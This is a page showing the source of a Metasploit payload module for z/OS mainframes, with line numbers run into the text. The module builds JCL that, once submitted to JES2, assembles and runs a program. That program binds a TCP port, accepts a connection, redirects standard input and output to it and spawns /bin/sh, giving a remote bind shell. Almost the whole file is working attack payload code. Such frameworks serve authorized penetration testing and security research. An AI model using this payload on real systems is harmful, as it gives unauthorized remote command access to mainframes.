Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb
Views: 11777
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3# This payload has no ebcdic<->ascii translator built in.4# Therefore it must use a shell which does, like mainframe_shell5#6# this payload will spawn a bind shell from z/os, when submitted7# on the system as JCL to JES28##91011module MetasploitModule12CachedSize = 1071213include Msf::Payload::Single14include Msf::Payload::Mainframe15include Msf::Sessions::CommandShellOptions1617def initialize(info = {})18super(merge_info(info,19'Name' => 'Z/OS (MVS) Command Shell, Bind TCP',20'Description' => 'Provide JCL which creates a bind shell21This implementation does not include ebcdic character translation,22so a client with translation capabilities is required. MSF handles23this automatically.',24'Author' => 'Bigendian Smalls',25'License' => MSF_LICENSE,26'Platform' => 'mainframe',27'Arch' => ARCH_CMD,28'Handler' => Msf::Handler::BindTcp,29'Session' => Msf::Sessions::MainframeShell,30'PayloadType' => 'cmd',31'RequiredCmd' => 'jcl',32'Payload' =>33{34'Offsets' => {},35'Payload' => ''36}))37register_options(38[39# need these defaulted so we can manipulate them in command_string40Opt::LHOST('0.0.0.0'),41Opt::LPORT(32700),42OptString.new('ACTNUM', [true, "Accounting info for JCL JOB card", "MSFUSER-ACCTING-INFO"]),43OptString.new('PGMNAME', [true, "Programmer name for JCL JOB card", "programmer name"]),44OptString.new('JCLASS', [true, "Job Class for JCL JOB card", "A"]),45OptString.new('NOTIFY', [false, "Notify User for JCL JOB card", ""]),46OptString.new('MSGCLASS', [true, "Message Class for JCL JOB card", "Z"]),47OptString.new('MSGLEVEL', [true, "Message Level for JCL JOB card", "(0,0)"])48], self.class49)50register_advanced_options(51[52OptBool.new('NTFYUSR', [true, "Include NOTIFY Parm?", false]),53OptString.new('JOBNAME', [true, "Job name for JCL JOB card", "DUMMY"])54],55self.class56)57end5859##60# Construct Payload61##62def generate(_opts = {})63super + command_string64end6566##67# Setup replacement vars and populate payload68##69def command_string70if (datastore['JOBNAME'] == "DUMMY") && !datastore['FTPUSER'].nil?71datastore['JOBNAME'] = (datastore['FTPUSER'] + "1").strip.upcase72end73lhost = Rex::Socket.resolv_nbo(datastore['LHOST'])74lhost = lhost.unpack("H*")[0]75lport = datastore['LPORT']76lport = lport.to_s.to_i.to_s(16).rjust(4, '0')7778jcl_jobcard +79"//**************************************/\n" \80"//* SPAWN BIND SHELL FOR MSF MODULE */\n" \81"//**************************************/\n" \82"//*\n" \83"//STEP1 EXEC PROC=ASMACLG,PARM.L=(CALL)\n" \84"//L.SYSLIB DD DSN=SYS1.CSSLIB,DISP=SHR\n" \85"//C.SYSIN DD *,DLM=ZZ\n" \86" TITLE 'Spawns Bind Shell'\n" \87"SPAWNBND CSECT\n" \88"SPAWNBND AMODE 31\n" \89"SPAWNBND RMODE ANY\n" \90"***********************************************************************\n" \91"* @SETUP registers and save areas *\n" \92"***********************************************************************\n" \93" USING *,15\n" \94"@SETUP0 B @SETUP1\n" \95" DROP 15\n" \96" DS 0H # half word boundary\n" \97"@SETUP1 STM 14,12,12(13) # save our registers\n" \98" LR 2,13 # callers sa\n" \99" LR 8,15 # pgm base in R8\n" \100" USING @SETUP0,8 # R8 for base addressability\n" \101"*************************************\n" \102"* set up data area / addressability *\n" \103"*************************************\n" \104" L 0,@DYNSIZE # len of variable area\n" \105" GETMAIN RU,LV=(0) # get data stg, len R0\n" \106" LR 13,1 # data address\n" \107" USING @DATA,13 # addressability for data area\n" \108" ST 2,@BACK # store callers sa address\n" \109" ST 13,8(,2) # store our data addr\n" \110" DS 0H # halfword boundaries\n" \111"\n" \112"***********************************************************************\n" \113"* BPX1SOC set up socket - inline *\n" \114"***********************************************************************\n" \115" CALL BPX1SOC, X\n" \116" (DOM,TYPE,PROTO,DIM,SRVFD, X\n" \117" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \118"*******************************\n" \119"* chk return code, 0 or exit *\n" \120"*******************************\n" \121" LHI 15,2\n" \122" L 6,RTN_VAL\n" \123" CIB 6,0,7,EXITP # R6 not 0? Time to exit\n" \124"\n" \125"***********************************************************************\n" \126"* BPX1BND (bind) bind to local socket - inline *\n" \127"***********************************************************************\n" \128" XC SOCKADDR(16),SOCKADDR # zero sock addr struct\n" \129" MVI SOCK_FAMILY,AF_INET # family inet\n" \130" MVI SOCK_LEN,SOCK#LEN # len of socket\n" \131" MVC SOCK_SIN_PORT,CONNSOCK # port to bind to\n" \132" MVC SOCK_SIN_ADDR,CONNADDR # address to bind to\n" \133" CALL BPX1BND, X\n" \134" (SRVFD,SOCKLEN,SOCKADDR, X\n" \135" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \136"*******************************\n" \137"* chk return code, 0 or exit *\n" \138"*******************************\n" \139" LHI 15,3\n" \140" L 6,RTN_VAL\n" \141" CIB 6,0,7,EXITP # R6 not 0? Time to exit\n" \142"\n" \143"***********************************************************************\n" \144"* BPX1LSN (listen) listen on local socket - inline *\n" \145"***********************************************************************\n" \146" CALL BPX1LSN, X\n" \147" (SRVFD,BACKLOG, X\n" \148" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \149"*******************************\n" \150"* chk return code, 0 or exit *\n" \151"*******************************\n" \152" LHI 15,4\n" \153" L 6,RTN_VAL\n" \154" CIB 6,0,7,EXITP # R6 not 0? Time to exit\n" \155"\n" \156"***********************************************************************\n" \157"* BPX1ACP (accept) accept socket connection - inline *\n" \158"***********************************************************************\n" \159" XC SOCKADDR(16),SOCKADDR # zero sock addr struct\n" \160" MVI SOCK_FAMILY,AF_INET # family inet\n" \161" MVI SOCK_LEN,SOCK#LEN # len of socket\n" \162" CALL BPX1ACP, X\n" \163" (SRVFD,CLILEN,CLISKT, X\n" \164" CLIFD,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \165"*******************************\n" \166"* chk return code, 0 or exit *\n" \167"*******************************\n" \168" LHI 15,5\n" \169" L 6,RTN_VAL\n" \170" CIB 6,0,7,EXITP # R6 not 0? Time to exit\n" \171"\n" \172"*************************************************\n" \173"* order of things to prep child pid *\n" \174"* 0) Dupe all 3 file desc of CLIFD *\n" \175"* 1) Dupe parent read fd to std input *\n" \176"*************************************************\n" \177"*******************\n" \178"***** STDIN *****\n" \179"*******************\n" \180" CALL BPX1FCT, X\n" \181" (CLIFD, X\n" \182" =A(F_DUPFD2), X\n" \183" =A(F_STDI), X\n" \184" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \185"****************************************************\n" \186"* chk return code here anything but -1 is ok *\n" \187"****************************************************\n" \188" LHI 15,6 # exit code for this func\n" \189" L 7,RTN_VAL # set r7 to rtn val\n" \190" CIB 7,-1,8,EXITP # r6 = -1 exit\n" \191"\n" \192"*******************\n" \193"***** STDOUT *****\n" \194"*******************\n" \195" CALL BPX1FCT, X\n" \196" (CLIFD, X\n" \197" =A(F_DUPFD2), X\n" \198" =A(F_STDO), X\n" \199" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \200"****************************************************\n" \201"* chk return code here anything but -1 is ok *\n" \202"****************************************************\n" \203" LHI 15,7 # exit code for this func\n" \204" L 7,RTN_VAL # set r7 to rtn val\n" \205" CIB 7,-1,8,EXITP # r6 = -1 exit\n" \206"\n" \207"*******************\n" \208"***** STDERR *****\n" \209"*******************\n" \210" CALL BPX1FCT, X\n" \211" (CLIFD, X\n" \212" =A(F_DUPFD2), X\n" \213" =A(F_STDE), X\n" \214" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \215"****************************************************\n" \216"* chk return code here anything but -1 is ok *\n" \217"****************************************************\n" \218" LHI 15,8 # exit code for this func\n" \219" L 7,RTN_VAL # set r7 to rtn val\n" \220" CIB 7,-1,8,EXITP # r7 = -1 exit\n" \221"\n" \222"***********************************************************************\n" \223"* BP1SPN (SPAWN) execute shell '/bin/sh' *\n" \224"***********************************************************************\n" \225" XC INHE(INHE#LENGTH),INHE # clear inhe structure\n" \226" XI INHEFLAGS0,INHESETPGROUP\n" \227" SPACE ,\n" \228" MVC INHEEYE,=C'INHE'\n" \229" LH 0,TLEN\n" \230" STH 0,INHELENGTH\n" \231" LH 0,TVER\n" \232" STH 0,INHEVERSION\n" \233" CALL BPX1SPN, X\n" \234" (EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL,EXENVC,EXENVLL, X\n" \235" EXENVL,FDCNT,FDLST,=A(INHE#LENGTH),INHE,RTN_VAL, X\n" \236" RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \237" LHI 15,9 # exit code for this func\n" \238" L 7,RTN_VAL # set r7 to rtn val\n" \239" L 6,RTN_COD\n" \240" L 5,RSN_COD\n" \241" CIB 7,-1,8,EXITP # r7 = -1 exit\n" \242"\n" \243"****************************************************\n" \244"* cleanup & exit preload R15 with exit code *\n" \245"****************************************************\n" \246" XR 15,15 # 4 FOR rc\n" \247"EXITP L 0,@DYNSIZE\n" \248" LR 1,13\n" \249" L 13,@BACK\n" \250" DROP 13\n" \251" FREEMAIN RU,LV=(0),A=(1) #free storage\n" \252" XR 15,15\n" \253" L 14,12(,13) # load R14\n" \254" LM 0,12,20(13) # load 0-12\n" \255" BSM 0,14 # branch to caller\n" \256"\n" \257"****************************************************\n" \258"* Constants and Variables *\n" \259"****************************************************\n" \260" DS 0F # constants full word boundary\n" \261"F_STDI EQU 0\n" \262"F_STDO EQU 1\n" \263"F_STDE EQU 2\n" \264"*************************\n" \265"* Socket conn variables * # functions used by pgm\n" \266"*************************\n" \267"CONNSOCK DC XL2'#{lport}' # LPORT\n" \268"CONNADDR DC XL4'#{lhost}' # LHOST\n" \269"BACKLOG DC F'1' # 1 byte backlog\n" \270"DOM DC A(AF_INET) # AF_INET = 2\n" \271"TYPE DC A(SOCK#_STREAM) # stream = 1\n" \272"PROTO DC A(IPPROTO_IP) # ip = 0\n" \273"DIM DC A(SOCK#DIM_SOCKET) # dim_sock = 1\n" \274"SOCKLEN DC A(SOCK#LEN+SOCK_SIN#LEN)\n" \275"CLILEN DC F'0' # client sock len - don't care\n" \276"CLISKT DC X'00' # client socket struck - don't care\n" \277"************************\n" \278"* BPX1SPN vars *********\n" \279"************************\n" \280"EXCMD DC CL7'/bin/sh' # command to exec\n" \281"EXCMDL DC A(L'EXCMD) # len of cmd to exec\n" \282"EXARGC DC F'1' # num of arguments\n" \283"EXARG1 DC CL2'sh' # arg 1 to exec\n" \284"EXARG1L DC A(L'EXARG1) # len of arg1\n" \285"EXARGL DC A(EXARG1) # addr of argument list\n" \286"EXARGLL DC A(EXARG1L) # addr of arg len list\n" \287"EXENVC DC F'0' # env var count\n" \288"EXENVL DC F'0' # env var arg list addr\n" \289"EXENVLL DC F'0' # env var arg len addr\n" \290"FDCNT DC F'0' # field count s/b 0\n" \291"FDLST DC F'0' # field list addr s/b 0\n" \292"TVER DC AL2(INHE#VER)\n" \293"TLEN DC AL2(INHE#LENGTH)\n" \294" SPACE ,\n" \295"@DYNSIZE DC A(@ENDYN-@DATA)\n" \296"***************************\n" \297"***** end of constants ****\n" \298"***************************\n" \299"@DATA DSECT ,\n" \300" DS 0D\n" \301"PLIST DS 16A\n" \302"RTN_VAL DS F # return value\n" \303"RTN_COD DS F # return code\n" \304"RSN_COD DS F # reason code\n" \305"CLIFD DS F # client fd\n" \306"SRVFD DS F # server fd\n" \307"@BACK DS A\n" \308"*\n" \309" BPXYSOCK LIST=NO,DSECT=NO\n" \310" BPXYFCTL LIST=NO,DSECT=NO\n" \311" BPXYINHE LIST=NO,DSECT=NO\n" \312"@ENDYN EQU *\n" \313"@DATA#LEN EQU *-@DATA\n" \314" BPXYCONS LIST=YES\n" \315" END SPAWNBND\n" \316"ZZ\n" \317"//*\n"318end319end320321322